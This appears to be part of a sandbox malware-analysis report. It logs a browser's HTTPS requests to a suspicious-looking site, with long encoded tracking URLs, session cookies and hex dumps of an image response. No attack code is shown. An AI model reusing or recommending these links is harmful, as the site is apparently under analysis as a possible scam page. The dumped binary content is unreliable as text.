                                                          Data Ascii: .href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.549731104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:49 UTC3742OUTGET /assets/images/state-farm-drake-2021.jpg HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:50 UTC698INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 30 37 38 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 30 35 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 32 37 34 31 35 2d 36 30 38 39 30 32 65 34 39 35 37 35 34 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 41 63 63 65
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:50 GMTContent-Type: image/jpegContent-Length: 160789Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:05 GMTETag: "27415-608902e495754"Cache-Control: max-age=14400CF-Cache-Status: MISSAcce
                                                          2023-11-27 03:23:50 UTC671INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 46 00 00 ff e1 03 2c 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 38 38 2c 20 32 30 32 30 2f 30 37 2f 31 30 2d 32 32 3a 30 36 3a 35 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                          Data Ascii: ExifII*DuckyF,http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xm
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 41 41 31 33 44 39 43 44 35 42 45 46 31 31 45 42 42 31 37 32 45 45 35 42 35 32 43 38 37 38 42 41 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 41 41 31 33 44 39 43 45 35 42 45 46 31 31 45 42 42 31 37 32 45 45 35 42 35 32 43 38 37 38 42 41 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 04 03 03 03 03 03 04 03 03 04 06 04 03 04 06 07 05 04 04 05 07 08 06 06 07 06 06 08 0a 08 09 09 09 09 08 0a 0a 0c 0c 0c 0c 0c 0a 0c
                                                          Data Ascii: dFrom stRef:instanceID="xmp.iid:AA13D9CD5BEF11EBB172EE5B52C878BA" stRef:documentID="xmp.did:AA13D9CE5BEF11EBB172EE5B52C878BA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 75 aa 9b 55 0e 6b c4 d0 d1 45 54 07 29 24 3b c5 60 d1 0b 3d a0 7b ea ea 90 b6 95 28 9c 96 1a 39 43 5c 2b 40 b7 d3 69 23 3d a2 2d d8 8a 16 8d 68 0a bf 38 8c 2c 36 96 8c 11 80 06 ab 3b bd 83 0f 5d 5a b4 06 9e b5 46 bc 94 6d 03 cf 6e d1 1b 28 28 7c 56 b6 f4 65 ac ea 22 08 01 8c 7c 16 3e 4e 89 1d 6d b8 2f 28 f2 16 16 eb 6d 13 95 36 05 b7 b4 06 67 73 1b 78 ad f4 ac 76 8a 0f 7f 4c fb 4b e6 88 47 50 00 5a e5 87 8f 52 31 17 d7 4e 63 5a 4f a7 fb 54 6d 57 a6 ab a6 3a 27 c8 d0 f7 6e 42 e5 de ba f0 90 92 d6 a3 5f 0e 89 4a 56 02 b8 81 fc 69 e0 55 e5 26 72 ad 77 f4 c7 53 4e 9f b1 6b 9e 88 9d d5 e8 19 23 63 f4 92 02 9c ae ae 96 dc 8e 26 40 7e ae 1b f8 aa b7 a2 27 74 1d a3 5c d7 9a 57 75 cb 5d 89 db 56 3c f8 f2 f1 51 92 4b c3 1b e8 37 04 23 00 67 17 74 d1 3c 07 b8 b9 39
                                                          Data Ascii: uUkET)$;`={(9C\+@i#=-h8,6;]ZFmn((|Ve"|>Nm/(m6gsxvLKGPZR1NcZOTmW:'nB_JViU&rwSNk#c&@~'t\Wu]V<QK7#gt<9
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 1e 0f c1 1e 03 c9 d0 f0 42 57 51 97 79 0a a9 f1 3f 22 b9 02 14 dd 55 e4 61 ec a9 53 e0 7e 41 dd 6c 09 4f c4 bc 8d 4f 64 1e da 30 eb e6 aa 6a 3c 81 b7 14 e7 90 5d d3 65 5e 29 f2 1d 1d 8b 58 dd 46 a3 74 78 8f 22 a5 b0 64 83 ae da 25 35 1e 46 1d 8a 04 00 ed 7f ee 55 82 94 f4 76 11 81 a0 a5 14 f8 aa 6d 4b 16 31 83 53 ba 3c 4f ca bc 6c d8 e1 4a 6e 9f 89 79 10 31 b1 07 72 a6 aa f5 46 c8 ac af 68 e3 f2 b3 09 27 6f ac 75 5a 65 18 72 df b3 ec 6d dc 28 05 06 da 29 a7 3a 25 60 c5 41 0b 40 68 a5 36 59 dd 72 d2 6c 70 da 33 c2 9f 25 3e 27 93 72 63 e1 7e 84 7c d3 c2 4c bf 11 04 ad 31 bc 55 9e 0a a2 61 9f f9 7a c8 0a 06 e8 9e 0c 63 2c 61 8e 23 08 1e 82 29 4f 24 54 ce e6 a3 c5 5a c7 f4 b2 8b 3b ac 69 e7 44 32 d6 16 6c c4 bc 20 f3 a7 68 1a 3d 23 74 fc 60 f2 af 54 a3 c6 1f
                                                          Data Ascii: BWQy?"UaS~AlOOd0j<]e^)XFtx"d%5FUvmK1S<OlJny1rFh'ouZerm():%`A@h6Yrlp3%>'rc~|L1Uazc,a#)O$TZ;iD2l h=#t`T
                                                          2023-11-27 03:23:50 UTC1369INData Raw: e5 13 c8 c3 a9 1b 88 22 4e a5 01 c3 ba 03 85 c7 e0 3a aa 85 54 6e f9 ef 03 87 80 c1 68 41 ba 92 ad 8f ad 0f 89 5a 48 cb 6b 86 2f 1d bc d7 f7 2e 96 62 5f 2c 8e 2e 7b cf 52 57 4f 1e ae 6d ae 53 2c 81 96 2c d3 ea 56 52 a3 af 2e 1d 37 5f 4d 12 5e 51 cd 15 2a 36 5c 48 5a 9e 24 0f da b9 f6 ae 8d 45 4d 73 c1 b4 58 e1 b7 92 22 e6 e3 95 68 56 98 65 6a 3e 59 c5 35 3a ad 23 2b 42 3e 50 ea 8a aa c2 2d 48 f6 ee 72 e7 0f 78 c9 23 71 f6 ea 2a df 9a 58 13 67 d0 1d bf dc 6d c8 5a b2 70 fa d4 6a 3c 0a cf 0b 82 32 17 77 6c 9b dd 84 7b 91 9f e1 ea 96 12 10 65 6d a6 21 b3 b0 c7 20 3a 3a 9f ec 4a c1 94 ce 3b 3d 2d 93 da e2 f1 71 6f b1 1b b8 03 fb d4 d8 bf 25 c6 07 61 f2 f1 03 19 0c 98 8a d3 62 b3 ba 65 a6 bc 96 23 ef f1 73 d9 9a fd 70 9d 9e 36 58 6d c7 87 4e bb e5 1c f1 a2 ca
                                                          Data Ascii: "N:TnhAZHk/.b_,.{RWOmS,,VR.7_M^Q*6\HZ$EMsX"hVej>Y5:#+B>P-Hrx#q*XgmZpj<2wl{em! ::J;=-qo%abe#sp6XmN
                                                          2023-11-27 03:23:50 UTC1369INData Raw: d4 27 03 b5 4c 3c 08 d7 54 13 84 a6 97 13 0e 84 40 50 dd 50 2a a1 30 82 b4 23 db 6f c1 7a 55 c8 39 a7 cd 40 2c bb d2 80 1d ee 34 40 21 af ae c5 00 f4 64 a0 0b 61 a8 a9 40 3c d3 a0 4c 1c 3f b5 01 e2 3c 34 a7 8a 02 17 b9 1a e3 89 b9 35 af a5 4d 0c a4 e8 10 a5 67 35 53 a7 9a 9a 10 5e d5 6a 90 38 c8 a8 28 80 99 c2 8a 38 ad 22 2a fd 63 fe 83 51 b3 3a 93 b6 15 22 aa 49 2f 06 8d 41 23 73 46 81 87 74 a9 88 c5 54 b1 30 9a 6c 7a 55 2a 9a 8c c8 30 7b 8d f1 4a 10 1b c6 8f 70 78 51 59 0d b1 6f f2 47 c5 25 0c 0d 01 3c 95 2c 1e 9e 09 80 b7 6d 73 47 26 1d 6b 54 aa f5 ee aa f7 8c cf 8a c2 39 ab 42 d7 03 5f 81 5c dc 91 e9 fa fd c1 5b f7 9e 6a 08 23 0d 98 70 0d 00 29 9a ab 96 48 2a 3f c8 d9 86 1f 50 6b db b6 ea f1 5c c3 ac bf 25 5f c9 20 85 f0 ea 76 a1 47 8d 2c ac ff 00 f3
                                                          Data Ascii: 'L<T@PP*0#ozU9@,4@!da@<L?<45Mg5S^j8(8"*cQ:"I/A#sFtT0lzU*0{JpxQYoG%<,msG&kT9B_\[j#p)H*?Pk\%_ vG,
                                                          2023-11-27 03:23:50 UTC1369INData Raw: cd a9 37 76 57 56 cd f7 0b 0f 16 8a ad a5 71 6d 15 98 b3 d3 4f 91 6c 16 82 92 34 fe e5 bd 98 8e 4f 3c ed 88 ba 5c 5f 64 af 20 63 2e 89 2d 68 fa 76 6d 57 3d ae cd 20 31 14 86 29 01 07 51 a2 35 bd 55 bc e8 90 ec 2c a4 56 73 cd 69 27 fa 92 38 86 fc d5 f2 f6 63 c5 f8 4f e5 9a 60 b8 2f 35 e2 f0 08 2b 89 d6 1d 97 2e e2 00 25 3a 25 38 cb 89 39 54 92 47 82 06 46 c7 75 25 29 cc 8f 25 34 f3 06 41 79 34 7a 89 08 25 47 53 e8 32 2c a5 c4 6e 0e 12 12 56 77 2d 24 89 38 3b 8e f1 a3 ea aa cf 6b b4 54 d2 25 2d 73 93 dc 55 a6 b4 3a 6e b9 b7 e6 b1 b6 bc 32 a2 33 76 30 b8 3e e6 9f cc 3a d5 69 c7 c9 69 ed c7 22 0a 10 05 57 66 63 9d a6 f6 ae 6e d6 d3 1b ed cb 18 73 a8 75 22 ab 1d 86 08 9a fa d2 e6 77 48 23 e2 4a 9d 79 21 5d 69 89 a2 13 9e 4d 6e a3 aa e8 9c 91 8d d2 8d ed f1 8e
                                                          Data Ascii: 7vWVqmOl4O<\_d c.-hvmW= 1)Q5U,Vsi'8cO`/5+.%:%89TGFu%)%4Ay4z%GS2,nVw-$8;kT%-sU:n23v0>:ii"Wfcnsu"wH#Jy!]iMn
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 6d 97 e9 2a 2d 5c d2 8c 8f 17 21 00 87 29 bb 46 93 54 a5 8d 94 90 b8 72 75 42 e1 e4 99 ae 9d 3a 13 9c 05 96 8e 2a f8 67 54 f2 2a b0 bc 6b 5f 15 e8 61 c6 b6 e0 25 0f 85 cd 1a d0 50 05 9e c5 04 5c 4d 2c 4f a8 6d 69 d2 8b 9f a3 4c 18 39 cb 80 d2 d6 b5 ac a7 f1 6e 57 57 1f 1e 58 72 5c 19 c2 4d 6f 91 cb c7 fd 5a 4a 59 57 f9 8e 3a 0f d5 76 d9 35 9d 5c 77 35 a9 e5 7b df b6 e0 c6 b3 0d db 17 ac 75 c9 a4 65 d1 6a c8 c9 d2 ad ae e5 73 6f 8d e6 35 98 1a db 1b 86 22 0b 48 bb 36 1b 38 2d db 28 16 7c 4c 00 0f e6 3c b3 5f fd e2 95 e2 bf 5e 24 ea e6 b9 f3 cb e2 8e ef b3 a4 97 31 4d 17 09 9a e7 07 33 c0 83 b2 f4 78 7a 45 6f ae 55 1c 55 a5 c5 b4 6e 92 46 10 d2 6a 01 f0 5b db 92 d3 5c 22 f2 97 42 e2 5e 0c 14 a1 a1 5b 71 49 23 1e 5b d7 0b 36 06 d9 c6 cc 3d a7 a2 e4 e5 bd 5d
                                                          Data Ascii: m*-\!)FTruB:*gT*k_a%P\M,OmiL9nWWXr\MoZJYW:v5\w5{uejso5"H68-(|L<_^$1M3xzEoUUnFj[\"B^[qI#[6=]
                                                          2023-11-27 03:23:50 UTC1369INData Raw: b0 e5 ec 7c 73 aa db f6 ec 90 12 e6 e8 02 f2 be cb e5 87 7f 84 c2 93 7b 6b 77 75 9a fb 4b 72 19 15 75 27 aa fa 3e 2e 9a 65 e3 ef 3c b6 58 af b0 c6 db 1c 23 84 03 21 1e a2 16 33 6b 6a ac c2 8f 6f 6f 3d 9d d3 e4 00 b5 ed 3c aa bb 63 93 68 d8 bb 3b f3 cd ee 17 1c 71 57 f1 1b 8e 02 90 48 ed db e4 9c 95 cf 59 de 77 28 dc ae 42 7b d7 fd 57 0f 32 3b c3 d4 6a ba 26 bf 03 24 d9 c5 0d cc 4e 61 a1 01 67 b5 b1 7a f5 51 af ad 6d d9 7c f6 1d cb 8d 17 47 1d e8 e5 e5 9d 56 3c 28 6b 22 f6 9a 74 d7 f6 ae 7e 5b 9a ea e2 bd 02 77 14 67 ec dc 00 d4 6c a7 4e ed b6 ec a3 b6 5a ee 68 42 ea f1 72 e4 f4 73 d7 42 51 75 54 d8 4b 26 1b 55 67 85 e5 c3 28 06 b5 46 15 2b af bb 2f 8e 87 5a 27 ac ea 8d b7 02 f7 b5 c5 6f 18 53 2e 6a a6 78 11 6b 56 9a 0e a8 18 58 f1 ef 11 8d 7c 14 da b9 13
                                                          Data Ascii: |s{kwuKru'>.e<X#!3kjoo=<ch;qWHYw(B{W2;j&$NagzQm|GV<(k"t~[wglNZhBrsBQuTK&Ug(F+/Z'oS.jxkVX|


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.549733104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:49 UTC3684OUTGET /assets/bootstrap/dist/js/bootstrap.min.js HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
